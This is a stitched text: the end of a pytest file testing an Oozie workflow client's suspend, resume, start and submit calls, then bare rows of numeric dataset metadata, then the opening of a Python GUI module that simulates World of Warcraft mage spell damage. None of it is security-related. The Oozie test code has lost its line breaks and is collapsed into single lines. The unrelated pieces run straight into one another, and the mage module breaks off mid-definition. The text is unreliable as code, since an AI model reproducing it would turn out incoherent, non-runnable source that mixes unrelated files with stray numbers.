coordinator action IDs' def test_job_coordinator_update(self, api, sample_coordinator_running, sample_coordinator_killed): with mock.patch.object(api, '_put') as mock_put: with mock.patch.object(api, 'job_coordinator_info') as mock_info: mock_info.return_value = sample_coordinator_running mock_put.return_value = {'update': {'diff': "****Empty Diff****"}} coord = api.job_coordinator_update(SAMPLE_COORD_ID, '/dummy/coord-path-minimal') conf = xml._coordinator_submission_xml('oozie', '/dummy/coord-path-minimal') mock_put.assert_called_with('job/' + SAMPLE_COORD_ID + "?action=update", conf) mock_info.assert_called_with(coordinator_id=SAMPLE_COORD_ID) assert coord is sample_coordinator_running mock_put.reset_mock() mock_info.reset_mock() mock_info.return_value = sample_coordinator_running mock_put.return_value = {'update': {'diff': "*****Diffs*****"}} coord = api.job_coordinator_update(SAMPLE_COORD_ID, '/dummy/coord-path-full') conf = xml._coordinator_submission_xml('oozie', '/dummy/coord-path-full') mock_put.assert_called_with('job/' + SAMPLE_COORD_ID + "?action=update", conf) mock_info.assert_called_with(coordinator_id=SAMPLE_COORD_ID) assert coord is sample_coordinator_running mock_put.reset_mock() mock_info.reset_mock() mock_info.return_value = sample_coordinator_killed with pytest.raises(exceptions.OozieException) as err: api.job_coordinator_update(SAMPLE_COORD_ID, '/dummy/coord-path-full') assert 'coordinator status must be active in order to update' in str(err) mock_info.return_value = sample_coordinator_running mock_put.return_value = {} with pytest.raises(exceptions.OozieException) as err: api.job_coordinator_update(SAMPLE_COORD_ID, '/dummy/coord-path-full') assert 'update coordinator' in str(err) class TestOozieClientJobWorkflowManage(object): def test_job_workflow_suspend_workflow(self, api, sample_workflow_running, sample_workflow_suspended): with mock.patch.object(api, '_put') as mock_put: with mock.patch.object(api, 'job_workflow_info') as mock_info: 
mock_info.return_value = sample_workflow_running assert api.job_workflow_suspend(SAMPLE_WF_ID) mock_put.assert_called_with('job/' + SAMPLE_WF_ID + '?action=suspend') mock_put.reset_mock() mock_info.return_value = sample_workflow_suspended assert not api.job_workflow_suspend(SAMPLE_WF_ID) assert not mock_put.called mock_put.reset_mock() def test_job_workflow_suspend_workflow_action(self, api, sample_workflow_running, sample_workflow_suspended): with mock.patch.object(api, '_put') as mock_put: with mock.patch.object(api, 'job_workflow_info') as mock_info: mock_info.return_value = sample_workflow_running assert api.job_workflow_suspend(SAMPLE_WF_ACTION) mock_put.assert_called_with('job/' + SAMPLE_WF_ID + '?action=suspend') mock_put.reset_mock() mock_info.return_value = sample_workflow_suspended assert not api.job_workflow_suspend(SAMPLE_WF_ACTION) assert not mock_put.called mock_put.reset_mock() def test_job_workflow_resume_workflow(self, api, sample_workflow_running, sample_workflow_suspended): with mock.patch.object(api, '_put') as mock_put: with mock.patch.object(api, 'job_workflow_info') as mock_info: mock_info.return_value = sample_workflow_suspended assert api.job_workflow_resume(SAMPLE_WF_ID) mock_put.assert_called_with('job/' + SAMPLE_WF_ID + '?action=resume') mock_put.reset_mock() mock_info.return_value = sample_workflow_running assert not api.job_workflow_resume(SAMPLE_WF_ID) assert not mock_put.called mock_put.reset_mock() def test_job_workflow_resume_workflow_action(self, api, sample_workflow_running, sample_workflow_suspended): with mock.patch.object(api, '_put') as mock_put: with mock.patch.object(api, 'job_workflow_info') as mock_info: mock_info.return_value = sample_workflow_suspended assert api.job_workflow_resume(SAMPLE_WF_ACTION) mock_put.assert_called_with('job/' + SAMPLE_WF_ID + '?action=resume') mock_put.reset_mock() mock_info.return_value = sample_workflow_running assert not api.job_workflow_resume(SAMPLE_WF_ACTION) assert not mock_put.called 
mock_put.reset_mock() def test_job_workflow_start_workflow(self, api, sample_workflow_running, sample_workflow_prep): with mock.patch.object(api, '_put') as mock_put: with mock.patch.object(api, 'job_workflow_info') as mock_info: mock_info.return_value = sample_workflow_prep assert api.job_workflow_start(SAMPLE_WF_ID) mock_put.assert_called_with('job/' + SAMPLE_WF_ID + '?action=start') mock_put.reset_mock() mock_info.return_value = sample_workflow_running assert not api.job_workflow_start(SAMPLE_WF_ID) assert not mock_put.called mock_put.reset_mock() def test_job_workflow_start_workflow_action(self, api, sample_workflow_running, sample_workflow_prep): with mock.patch.object(api, '_put') as mock_put: with mock.patch.object(api, 'job_workflow_info') as mock_info: mock_info.return_value = sample_workflow_prep assert api.job_workflow_start(SAMPLE_WF_ACTION) mock_put.assert_called_with('job/' + SAMPLE_WF_ID + '?action=start') mock_put.reset_mock() mock_info.return_value = sample_workflow_running assert not api.job_workflow_start(SAMPLE_WF_ACTION) assert not mock_put.called mock_put.reset_mock() class TestOozieClientJobSubmit(object): def test_jobs_submit_coordinator(self, api, sample_coordinator_running): with mock.patch.object(api, '_post') as mock_post: with mock.patch.object(api, 'job_coordinator_info') as mock_info: mock_info.return_value = sample_coordinator_running mock_post.return_value = None with pytest.raises(exceptions.OozieException) as err: api.jobs_submit_coordinator('/dummy/coord-path') assert 'Operation failed: submit coordinator' in str(err) mock_post.assert_called_with('jobs', mock.ANY) mock_post.reset_mock() mock_post.return_value = {'id': SAMPLE_COORD_ID} coord = api.jobs_submit_coordinator('/dummy/coord-path') mock_post.assert_called_with('jobs', mock.ANY) mock_info.assert_called_with(coordinator_id=SAMPLE_COORD_ID) assert coord is sample_coordinator_running mock_post.reset_mock() def test_jobs_submit_coordinator_config(self, api, 
sample_coordinator_running): with mock.patch.object(api, '_post') as mock_post: with mock.patch.object(api, 'job_coordinator_info') as mock_info: mock_info.return_value = sample_coordinator_running mock_post.return_value = {'id': SAMPLE_COORD_ID} api.jobs_submit_coordinator('/dummy/coord-path') conf = mock_post.call_args[0][1].decode('utf-8') assert '<name>oozie.coord.application.path</name><value>/dummy/coord-path</value>' in conf assert '<name>user.name</name><value>oozie</value>' in conf mock_post.reset_mock() api.jobs_submit_coordinator('/dummy/coord-path', configuration={'test.prop': 'this is a test'}) conf = mock_post.call_args[0][1].decode('utf-8') assert '<name>test.prop</name><value>this is a test</value>' in conf mock_post.reset_mock() def test_jobs_submit_workflow(self, api, sample_workflow_running): with mock.patch.object(api, '_post') as mock_post: with mock.patch.object(api, 'job_workflow_info') as mock_info: mock_info.return_value = sample_workflow_running mock_post.return_value = None with pytest.raises(exceptions.OozieException) as err: api.jobs_submit_workflow('/dummy/wf-path') assert 'Operation failed: submit workflow' in str(err) mock_post.assert_called_with('jobs', mock.ANY) mock_post.reset_mock() mock_post.return_value = {'id': SAMPLE_WF_ID} wf = api.jobs_submit_workflow('/dummy/wf-path', start=True) mock_post.assert_called_with('jobs?action=start', mock.ANY) assert wf is sample_workflow_running mock_post.reset_mock() mock_post.return_value = {'id': SAMPLE_WF_ID} wf = api.jobs_submit_workflow('/dummy/wf-path') mock_post.assert_called_with('jobs', mock.ANY) mock_info.assert_called_with(workflow_id=SAMPLE_WF_ID) assert wf is sample_workflow_running mock_post.reset_mock() def test_jobs_submit_workflow_config(self, api, sample_workflow_running): with mock.patch.object(api, '_post') as mock_post: with mock.patch.object(api, 'job_workflow_info') as mock_info: mock_info.return_value = sample_workflow_running mock_post.return_value = {'id': 
SAMPLE_WF_ID} api.jobs_submit_workflow('/dummy/wf-path') conf = mock_post.call_args[0][1].decode('utf-8') assert '<name>oozie.wf.application.path</name><value>/dummy/wf-path</value>' in conf assert '<name>user.name</name><value>oozie</value>' in conf mock_post.reset_mock() api.jobs_submit_workflow('/dummy/wf-path', configuration={'test.prop': 'this is a test'}) conf = mock_post.call_args[0][1].decode('utf-8') assert '<name>test.prop</name><value>this is a test</value>' in conf mock_post.reset_mock()
47.045678
118
0.647776
7,990
66,946
5.087484
0.039049
0.036532
0.049989
0.040665
0.883564
0.850943
0.823292
0.793599
0.759428
0.713769
0
0.010078
0.257401
66,946
1,422
119
47.078762
0.807579
0.002838
0
0.522847
0
0.002636
0.136311
0.041527
0
0
0
0.000703
0.255712
1
0.073814
false
0.007909
0.008787
0.000879
0.102812
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
bdb903aa24f6b049c642dc46fbe0678bd7b992ac
35,706
py
Python
modules/tbc_mage.py
ClawDoctor/TBC_GUI_sim
ebdb40ef348f5b00b10f6323f07260f47e8aab74
[ "MIT" ]
null
null
null
modules/tbc_mage.py
ClawDoctor/TBC_GUI_sim
ebdb40ef348f5b00b10f6323f07260f47e8aab74
[ "MIT" ]
null
null
null
modules/tbc_mage.py
ClawDoctor/TBC_GUI_sim
ebdb40ef348f5b00b10f6323f07260f47e8aab74
[ "MIT" ]
null
null
null
import fns import numpy as np import sys def eprint(*args, **kwargs): print(*args, file=sys.stderr, **kwargs) from .libs import tbc_mage_backend as bck import importlib importlib.reload(bck) def read_stat_file(location, file, stats): loc = '/'.join(location.split('/')[:-1])+'/'+file with open(loc) as f: #print('stats for '+location+': '+loc) for line in f: if '#' in line: line = line.split('#')[0] sp = line.split() if len(sp)>1: if not sp[0][0] == '#': if sp[0] == 'intellect': stats['intellect'] = float(sp[1].strip()) if sp[0] == 'spirit': stats['spirit'] = float(sp[1].strip()) if sp[0] == 'common_spell_damage': stats['common_spell_damage'] = float(sp[1].strip()) if sp[0] == 'crit_rating': stats['crit_rating'] = float(sp[1].strip()) if sp[0] == 'hit_rating': stats['hit_rating'] = float(sp[1].strip()) if sp[0] == 'mp5': stats['mp5'] = float(sp[1].strip()) if sp[0] == 'fire_damage': stats['fire_damage'] = float(sp[1].strip()) if sp[0] == 'frost_damage': stats['frost_damage'] = float(sp[1].strip()) if sp[0] == 'arcane_damage': stats['arcane_damage'] = float(sp[1].strip()) if sp[0] == 'haste_rating': stats['haste_rating'] = float(sp[1].strip()) class mage_file: def __init__(self,location): self.location= location self.label = 'no label' self.stats = {} self.talents = bck.make_talents() self.burn_rot = [] self.save_rot = [] with open(location) as f: for line in f: if '#' in line: line = line.split('#')[0] sp = line.split() if len(sp)>1: if not sp[0][0] == '#': if sp[0] == 'stats_file': read_stat_file(location, sp[1], self.stats) if sp[0] == 'intellect': self.stats['intellect'] = float(sp[1].strip()) if sp[0] == 'spirit': self.stats['spirit'] = float(sp[1].strip()) if sp[0] == 'common_spell_damage': self.stats['common_spell_damage'] = float(sp[1].strip()) if sp[0] == 'crit_rating': self.stats['crit_rating'] = float(sp[1].strip()) if sp[0] == 'hit_rating': self.stats['hit_rating'] = float(sp[1].strip()) if sp[0] == 'mp5': self.stats['mp5'] = float(sp[1].strip()) if sp[0] 
== 'fire_damage': self.stats['fire_damage'] = float(sp[1].strip()) if sp[0] == 'frost_damage': self.stats['frost_damage'] = float(sp[1].strip()) if sp[0] == 'arcane_damage': self.stats['arcane_damage'] = float(sp[1].strip()) if sp[0] == 'haste_rating': self.stats['haste_rating'] = float(sp[1].strip()) for talent in self.talents: if sp[0] == talent: self.talents[talent] = int(sp[1].strip()) if sp[0] == 'burn_rotation:': for i in range(1,len(sp)): self.burn_rot.append(sp[i]) if sp[0] == 'save_rotation:': for i in range(1,len(sp)): self.save_rot.append(sp[i]) if sp[0] == 'label': self.label = ' '.join(sp[1:]) if sp[0] == 'color': self.color = [0,0,0,1] self.color[0] = float(sp[1]) self.color[1] = float(sp[2]) self.color[2] = float(sp[3]) def parse_rot(rot): new_rot =[] l = len(rot) for i, spell in enumerate(rot): if spell == 'fireball': pos_ign = 0 if rot[(i+1)%l] == 'fireball': pos_ign +=1 if rot[(i+2)%l] == 'fireball': pos_ign +=1 elif rot[(i+2)%l] == 'scorch' and rot[(i+3)%l] == 'scorch': pos_ign +=1 elif rot[(i+1)%l] == 'scorch' and rot[(i+2)%l] == 'scorch': pos_ign +=1 if rot[(i+3)%l] == 'fireball': pos_ign +=1 elif rot[(i+3)%l] == 'scorch' and rot[(i+4)%l] == 'scorch': pos_ign +=1 if pos_ign == 2: new_rot.append('fireball_13_one_tick') elif pos_ign == 1: new_rot.append('fireball_13_one_tick_one_roll') elif pos_ign == 0: new_rot.append('fireball_13_one_tick_no_roll') elif spell == 'scorch': pos_ign = 0 if rot[(i+1)%l] == 'fireball': pos_ign +=1 if rot[(i+2)%l] == 'fireball': pos_ign +=1 elif rot[(i+2)%l] == 'scorch' and rot[(i+3)%l] == 'scorch': pos_ign +=1 elif rot[(i+1)%l] == 'scorch' and rot[(i+2)%l] == 'scorch': pos_ign +=1 if rot[(i+3)%l] == 'fireball': pos_ign +=1 elif rot[(i+3)%l] == 'scorch' and rot[(i+4)%l] == 'scorch': pos_ign +=1 if pos_ign == 2: new_rot.append('scorch_9') elif pos_ign == 1: new_rot.append('scorch_9_one_roll') elif pos_ign == 0: new_rot.append('scorch_9_no_roll') new_rot.append('scorch_9') elif spell == 'fireblast': 
new_rot.append('fireblast') elif spell == 'arcane_missiles': new_rot.append('arcane_missiles_10') elif spell == 'frostbolt': new_rot.append('frostbolt_13') elif spell == 'arcane_blast_0speed_0mana': new_rot.append('arcane_blast_1_0speed_0mana') elif spell == 'arcane_blast_1speed_1mana': new_rot.append('arcane_blast_1_1speed_1mana') elif spell == 'arcane_blast_2speed_2mana': new_rot.append('arcane_blast_1_2speed_2mana') elif spell == 'arcane_blast_3speed_3mana': new_rot.append('arcane_blast_1_3speed_3mana') elif spell == 'arcane_blast_1speed_0mana': new_rot.append('arcane_blast_1_1speed_0mana') elif spell == 'arcane_blast_2speed_0mana': new_rot.append('arcane_blast_1_2speed_0mana') elif spell == 'arcane_blast_3speed_0mana': new_rot.append('arcane_blast_1_3speed_0mana') else: print('spell '+ spell+ ' not found, possible spells are:') pos_spells = ['fireball_13_one_tick', 'fireball', 'scorch', 'fireblast', #'pyroblast', #'pom_pyroblast', 'arcane_missiles', 'arcane_blast_0speed_0mana', 'arcane_blast_1speed_1mana', 'arcane_blast_2speed_2mana', 'arcane_blast_3speed_3mana', 'arcane_blast_1speed_0mana', 'arcane_blast_2speed_0mana', 'arcane_blast_3speed_0mana', 'frostbolt', ] for spell in pos_spells: print(spell) return new_rot class moduleClass: filetypes=['mage'] def __init__ (self, fig, locations, frame, ui): self.fig=fig self.frame=frame self.locations=locations self.ui=ui def run(self): if self.ui['save_check']: try: import os os.makedirs(self.ui['save_filename']) except: None ui=self.ui fig=self.fig #prepare figure fig.clear() #load mages mage_colors = [[0.5,0,1,1], [1,0.5,0,1], [0.2,0.2,1,1], [0,0,0,1], [0.5,0,1,1], [1,1,0,1], [0.2,1,1,1], [0,1,0,1], ] self.mages=[] for i, location in enumerate(self.locations): self.mages.append(mage_file(location)) if self.mages[-1].save_rot[0] == 'arcane_frost_clearcasting_optimized': None elif self.mages[-1].save_rot[0] == 'fireball_spam_clearcasting_optimized': None elif self.mages[-1].save_rot[0] == 
'frostbolt_spam_clearcasting_optimized': None elif self.mages[-1].save_rot[0] == 'scorch_spam_clearcasting_optimized': None else: self.mages[-1].save_rot = parse_rot(self.mages[-1].save_rot) if self.mages[-1].burn_rot[0] == 'None': None elif self.mages[-1].burn_rot[0] == 'AB_spam_clearcasting_optimized': None else: self.mages[-1].burn_rot = parse_rot(self.mages[-1].burn_rot) if not hasattr(self.mages[-1],'color'): self.mages[-1].color = mage_colors[i%8] for key in ['disable_arcane_power', 'disable_icy_veins', 'disable_cold_snap', 'disable_water_elemental', 'disable_combustion', 'disable_PoM_pyro', 'ignore_scorch_ramp']: self.mages[-1].talents[key] = ui[key] #load buffs buff_cases = [] for i in range(5): #merge coe and cos, as in patch 2.4(?) ui['buff_case_'+str(i)+'_curse_of_shadow'] = ui['buff_case_'+str(i)+'_curse_of_elements'] buff_cases.append({}) buff_case_str = 'buff_case_'+str(i)+'_' for key in ui: if buff_case_str in key: buff = key.split(buff_case_str)[1] try: buff_cases[i][buff] = int(ui[key]) except: buff_cases[i][buff] = ui[key] if buff_cases[i]['armor'] == 'mage armor': buff_cases[i]['mage_armor'] = 1 buff_cases[i]['molten_armor'] = 0 else: buff_cases[i]['mage_armor'] = 0 buff_cases[i]['molten_armor'] = 1 #buttons.append({'key': 'buff_case_'+str(k)+'armor', 'type': 'radio:text', 'texts': ['molten armor', 'mage armor']','default': '0', 'tab': 1, 'row': i}) #buttons.append({'key': 'buff_case_'+str(k)+'_molten_armor', 'type': 'check', 'text': 'molten armor','default': '1', 'tab': 1, 'row': i}) #buttons.append({'key': 'buff_case_'+str(k)+'_mage_armor', 'type': 'check', 'text': 'mage armor','default': '0', 'tab': 1, 'row': i}) #plot measurements linestyles=['-','-.','--',(0, (3, 1, 1, 1, 1, 1)),':'] self.frame.hidden_figure.set_dpi(300) self.frame.hidden_figure.set_size_inches(6,4) #self.frame.update() #self.frame.figure. 
canvas.draw() if ui['plot_dmg']: ax = fns.add_axis(self.fig,2) ax.grid() misc = [] for i, buff_case in enumerate(buff_cases): linestyle = linestyles[i] if buff_case['check'] == 1: for mage in self.mages: misc = plot_dps(ui, mage, buff_case, i, linestyle, ax, misc, fractions = ui['include_rotation_fractions'], DMG = True) if ui['save_check']: misc = [] self.frame.hidden_figure.clf() tempax = self.frame.hidden_figure.add_subplot(111) tempax.grid() for i, buff_case in enumerate(buff_cases): linestyle = linestyles[i] if buff_case['check'] == 1: for mage in self.mages: misc = plot_dps(ui, mage, buff_case, i, linestyle, tempax, misc, fractions = ui['include_rotation_fractions'], DMG = True) self.frame.hidden_figure.tight_layout() #print(self.frame.tempfig) self.frame.hidden_figure.savefig(ui['save_filename']+'/dmg.svg') self.frame.hidden_figure.savefig(ui['save_filename']+'/dmg.png') #self.frame.update() #self.frame.figure.canvas.draw() if ui['plot_dps']: ax = fns.add_axis(self.fig,2) ax.grid() misc = [] for i, buff_case in enumerate(buff_cases): linestyle = linestyles[i] if buff_case['check'] == 1: for mage in self.mages: misc = plot_dps(ui, mage, buff_case, i, linestyle, ax, misc, fractions = ui['include_rotation_fractions'], DMG = False) if ui['save_check']: misc = [] self.frame.hidden_figure.clf() tempax = self.frame.hidden_figure.add_subplot(111) tempax.grid() for i, buff_case in enumerate(buff_cases): linestyle = linestyles[i] if buff_case['check'] == 1: for mage in self.mages: misc = plot_dps(ui, mage, buff_case, i, linestyle, tempax, misc, fractions = ui['include_rotation_fractions'], DMG = False) self.frame.hidden_figure.tight_layout() #print(self.frame.tempfig) self.frame.hidden_figure.savefig(ui['save_filename']+'/dps.svg') self.frame.hidden_figure.savefig(ui['save_filename']+'/dps.png') #self.frame.update() #self.frame.figure.canvas.draw() if ui['plot_compare_buff_states']: num_buff_cases = 0 for i, buff_case in enumerate(buff_cases): if buff_case['check'] == 
1: num_buff_cases+=1 if num_buff_cases>1: ax = fns.add_axis(self.fig,2) plot_compare_buff_states(ui, self.mages, buff_cases, linestyles, ax) if ui['save_check']: self.frame.hidden_figure.clf() tempax = self.frame.hidden_figure.add_subplot(111) plot_compare_buff_states(ui, self.mages, buff_cases, linestyles, tempax) self.frame.hidden_figure.tight_layout() #print(self.frame.tempfig) self.frame.hidden_figure.savefig(ui['save_filename']+'/comp_buff_states.svg') self.frame.hidden_figure.savefig(ui['save_filename']+'/comp_buff_states.png') if ui['plot_compare_mages']: if hasattr(self.frame,'default_mage'): default_mage=mage_file(self.frame.default_mage) if default_mage.save_rot[0] == 'arcane_frost_clearcasting_optimized': None elif default_mage.save_rot[0] == 'fireball_spam_clearcasting_optimized': None elif default_mage.save_rot[0] == 'frostbolt_spam_clearcasting_optimized': None elif default_mage.save_rot[0] == 'scorch_spam_clearcasting_optimized': None else: default_mage.save_rot = parse_rot(default_mage.save_rot) if default_mage.burn_rot[0] == 'None': None elif default_mage.burn_rot[0] == 'AB_spam_clearcasting_optimized': None else: default_mage.burn_rot = parse_rot(default_mage.burn_rot) if not hasattr(default_mage,'color'): default_mage.color = mage_colors[i%8] for key in ['disable_arcane_power', 'disable_icy_veins', 'disable_cold_snap', 'disable_water_elemental', 'disable_combustion', 'disable_PoM_pyro', 'ignore_scorch_ramp']: default_mage.talents[key] = ui[key] ax = fns.add_axis(self.fig,2) plot_compare_mages(ui, default_mage, self.mages, buff_cases, linestyles, ax) if ui['save_check']: self.frame.hidden_figure.clf() tempax = self.frame.hidden_figure.add_subplot(111) plot_compare_mages(ui, default_mage, self.mages, buff_cases, linestyles, tempax) self.frame.hidden_figure.tight_layout() #print(self.frame.tempfig) self.frame.hidden_figure.savefig(ui['save_filename']+'/comp_mages.svg') self.frame.hidden_figure.savefig(ui['save_filename']+'/comp_mages.png') if 
ui['plot_spell_dps']: ax = fns.add_axis(self.fig,2) plot_spell_dps(ui, self.mages, buff_cases, linestyles, ax) if ui['save_check']: self.frame.hidden_figure.clf() tempax = self.frame.hidden_figure.add_subplot(111) plot_spell_dps(ui, self.mages, buff_cases, linestyles, tempax) self.frame.hidden_figure.tight_layout() #print(self.frame.tempfig) self.frame.hidden_figure.savefig(ui['save_filename']+'/spell_dps.svg') self.frame.hidden_figure.savefig(ui['save_filename']+'/spell_dps.png') #self.frame.figure.canvas.draw() if ui['plot_spell_dpm']: ax = fns.add_axis(self.fig,2) plot_spell_dps(ui, self.mages, buff_cases, linestyles, ax, DPM= True) if ui['save_check']: self.frame.hidden_figure.clf() tempax = self.frame.hidden_figure.add_subplot(111) plot_spell_dps(ui, self.mages, buff_cases, linestyles, tempax, DPM= True) self.frame.hidden_figure.tight_layout() #print(self.frame.tempfig) self.frame.hidden_figure.savefig(ui['save_filename']+'/spell_dpm.svg') self.frame.hidden_figure.savefig(ui['save_filename']+'/spell_dpm.png') #self.frame.figure.canvas.draw() if ui['plot_stat_weights']: ax = fns.add_axis(self.fig,2) plot_stat_weights(ui, self.mages, buff_cases, linestyles, ax) if ui['save_check']: self.frame.hidden_figure.clf() tempax = self.frame.hidden_figure.add_subplot(111) plot_stat_weights(ui, self.mages, buff_cases, linestyles, tempax) self.frame.hidden_figure.tight_layout() #print(self.frame.tempfig) self.frame.hidden_figure.savefig(ui['save_filename']+'/stat_weights.svg') self.frame.hidden_figure.savefig(ui['save_filename']+'/stat_weights.png') ''' ax.legend() #set x and ylabel ax.set_xlabel(ui['XYxlabel']) ax.set_xlim([ui['XYxmin'],ui['XYxmax']]) ax.set_ylabel(ui['XYylabel']) ''' if ui['save_check']: self.fig.savefig(ui['save_filename']+'/all.svg') self.fig.savefig(ui['save_filename']+'/all.png') fig.canvas.draw() self.frame.update() def addButtons(): buttons=[ {'key': 'mage_tab_0_name', 'type': 'tabname', 'text': 'misc', 'tab': 0} , {'key': 'mage_tab_1_name', 'type': 
'tabname', 'text': 'buffs', 'tab': 1} , {'key': 'plot_dmg', 'type': 'check', 'text': 'plot_dmg','default': '1', 'tab': 0, 'row': 0}, {'key': 'plot_dps', 'type': 'check', 'text': 'plot_dps','default': '1', 'tab': 0, 'row': 0}, {'key': 'include_rotation_fractions', 'type': 'check', 'text': 'include rotation fractions','default': '0', 'tab': 0, 'row': 0}, {'key': 'plot_compare_buff_states', 'type': 'check', 'text': 'plot_compare_buff_states','default': '1', 'tab': 0, 'row': 0}, {'key': 'set_default_mage', 'type': 'click', 'text': 'set_default_mage','bind': set_default_mage, 'tab': 0, 'row': 0}, {'key': 'plot_compare_mages', 'type': 'check', 'text': 'plot_compare_mages','default': '1', 'tab': 0, 'row': 0}, #{'key': 'clear_default_mage', 'type': 'click', 'text': 'set_default_mage','bind': clear_default_mage, 'tab': 10, 'row': 0}, {'key': 'plot_spell_dps', 'type': 'check', 'text': 'plot_spell_dps','default': '0', 'tab': 0, 'row': 0}, {'key': 'plot_spell_dpm', 'type': 'check', 'text': 'plot_spell_dpm','default': '0', 'tab': 0, 'row': 0}, {'key': 'plot_stat_weights', 'type': 'check', 'text': 'plot_stat_weights','default': '0', 'tab': 0, 'row': 0}, {'key': 'time_min', 'type': 'txt:float', 'text': 'time_min', 'default': '40', 'width': 4, 'tab': 0, 'row': 1} , {'key': 'time_max', 'type': 'txt:float', 'text': 'time_max', 'default': '180', 'width': 4, 'tab': 0, 'row': 1} , {'key': 'dps_min', 'type': 'txt:float', 'text': 'dps_min', 'default': '0', 'width': 4, 'tab': 0, 'row': 2} , {'key': 'dps_max', 'type': 'txt:float', 'text': 'dps_max', 'default': '2000', 'width': 4, 'tab': 0, 'row': 2} , {'key': 'stat_weight_ymax', 'type': 'txt:int', 'text': 'stat_weight_ymax', 'default': '2', 'width': 4, 'tab': 0, 'row': 2} , {'key': 'disable_arcane_power', 'type': 'check', 'text': 'disable_arcane_power','default': '0', 'tab': 0, 'row': 3}, {'key': 'disable_icy_veins', 'type': 'check', 'text': 'disable_icy_veins','default': '0', 'tab': 0, 'row': 3}, {'key': 'disable_cold_snap', 'type': 
'check', 'text': 'disable_cold_snap','default': '0', 'tab': 0, 'row': 3}, {'key': 'disable_water_elemental', 'type': 'check', 'text': 'disable_water_elemental','default': '0', 'tab': 0, 'row': 3}, {'key': 'disable_combustion', 'type': 'check', 'text': 'disable_combustion','default': '0', 'tab': 0, 'row': 3}, {'key': 'disable_PoM_pyro', 'type': 'check', 'text': 'disable_PoM_pyro','default': '0', 'tab': 0, 'row': 3}, {'key': 'ignore_scorch_ramp', 'type': 'check', 'text': 'ignore_scorch_ramp','default': '0', 'tab': 0, 'row': 3}, ] j = len(buttons) for k in range(5): i=k*2 buttons.append({'key': 'buff_case_'+str(k)+'_check', 'type': 'check', 'text': 'Buffs '+str(k),'default': '0', 'tab': 1, 'row': i}) buttons.append({'key': 'buff_case_'+str(k)+'_label', 'type': 'txt', 'text': 'label:','default': 'buffs '+str(k), 'width': 10, 'tab': 1, 'row': i}) buttons.append({'key': 'buff_case_'+str(k)+'_arcane_intellect', 'type': 'check', 'text': 'AI','default': '1', 'tab': 1, 'row': i}) buttons.append({'key': 'buff_case_'+str(k)+'_armor', 'type': 'radio:text', 'texts': ['molten armor', 'mage armor'],'default': '0', 'tab': 1, 'row': i}) #buttons.append({'key': 'buff_case_'+str(k)+'_molten_armor', 'type': 'check', 'text': 'molten armor','default': '1', 'tab': 1, 'row': i}) #buttons.append({'key': 'buff_case_'+str(k)+'_mage_armor', 'type': 'check', 'text': 'mage armor','default': '0', 'tab': 1, 'row': i}) buttons.append({'key': 'buff_case_'+str(k)+'_misc_add_mana', 'type': 'txt:float', 'text': '| misc mana (mana ruby, potions, etc)','default': '2400','width': 5, 'tab': 1, 'row': i}) buttons.append({'key': 'buff_case_'+str(k)+'_innervate', 'type': 'txt:float', 'text': '# of innervates','default': '0','width': 2, 'tab': 1, 'row': i}) buttons.append({'key': 'buff_case_'+str(k)+'_dummy_label', 'type': 'label', 'text': ' ', 'tab': 1, 'row': i+1}) #{'key': 'XYxlabel', 'type': 'txt', 'text': 'x label', 'default': r'$2\theta$', 'width': 10, 'tab': 0, 'row': 1} , #buttons.append({'key': 
'buff_case_'+str(k)+'_curse_of_shadow', 'type': 'check', 'text': 'CoS','default': '1', 'tab': 1, 'row': i+1}) buttons.append({'key': 'buff_case_'+str(k)+'_curse_of_elements', 'type': 'check', 'text': 'CoE','default': '1', 'tab': 1, 'row': i+1}) buttons.append({'key': 'buff_case_'+str(k)+'_malediction', 'type': 'check', 'text': 'Malediction','default': '1', 'tab': 1, 'row': i+1}) buttons.append({'key': 'buff_case_'+str(k)+'_divine_spirit', 'type': 'check', 'text': 'D.spirit','default': '1', 'tab': 1, 'row': i+1}) buttons.append({'key': 'buff_case_'+str(k)+'_improved_divine_spirit', 'type': 'check', 'text': 'Imp.d.spirit','default': '1', 'tab': 1, 'row': i+1}) buttons.append({'key': 'buff_case_'+str(k)+'_wrath_of_air_totem', 'type': 'check', 'text': 'WoA totem','default': '0', 'tab': 1, 'row': i+1}) buttons.append({'key': 'buff_case_'+str(k)+'_improved_wrath_of_air_totem', 'type': 'check', 'text': 'imp.WoA','default': '0', 'tab': 1, 'row': i+1}) buttons.append({'key': 'buff_case_'+str(k)+'_totem_of_wrath', 'type': 'check', 'text': 'totem of wrath','default': '0', 'tab': 1, 'row': i+1}) buttons.append({'key': 'buff_case_'+str(k)+'_mark_of_the_wild', 'type': 'check', 'text': 'MotW','default': '1', 'tab': 1, 'row': i+1}) buttons.append({'key': 'buff_case_'+str(k)+'_improved_mark_of_the_wild', 'type': 'check', 'text': 'imp.MotW','default': '1', 'tab': 1, 'row': i+1}) buttons.append({'key': 'buff_case_'+str(k)+'_blessing_of_kings', 'type': 'check', 'text': 'BoK','default': '1', 'tab': 1, 'row': i+1}) buttons.append({'key': 'buff_case_'+str(k)+'_blessing_of_wisdom', 'type': 'check', 'text': 'BoW','default': '1', 'tab': 1, 'row': i+1}) buttons.append({'key': 'buff_case_'+str(k)+'_judgement_of_wisdom', 'type': 'check', 'text': 'JoW','default': '1', 'tab': 1, 'row': i+1}) buttons.append({'key': 'buff_case_'+str(k)+'_shadow_priest_dps', 'type': 'txt:float', 'text': 'SP dps', 'default': '0', 'width': 4, 'tab': 1, 'row': i+1}) buttons.append({'key': 
'buff_case_'+str(k)+'_misery', 'type': 'check', 'text': 'misery','default': '0', 'tab': 1, 'row': i+1}) buttons.append({'key': 'buff_case_'+str(k)+'_2_tier5_set_bonus', 'type': 'check', 'text': '2_tier5_set_bonus','default': '0', 'tab': 1, 'row': i+1}) buttons.append({'key': 'buff_case_'+str(k)+'_spellfire_set', 'type': 'check', 'text': 'spellfire set','default': '0', 'tab': 1, 'row': i+1}) buttons[j]['default'] = 1 #{'key': 'XYxmin', 'type': 'txt:float', 'text': 'x min', 'default': '0', 'width': 4, 'tab': 0, 'row': 1} , #{'key': 'XYxmax', 'type': 'txt:float', 'text': 'x max', 'default': '120', 'width': 4, 'tab': 0, 'row': 1} , #{'key': 'XYxlabel', 'type': 'txt', 'text': 'x label', 'default': r'$2\theta$', 'width': 10, 'tab': 0, 'row': 1} , #{'key': 'XYnormalize', 'type': 'check', 'text': 'Normalize y-axis', 'tab': 0, 'row': 2} , #{'key': 'XYylabel_text', 'type': 'label', 'text': 'ylabel: ', 'tab': 0, 'row': 2} , #{'key': 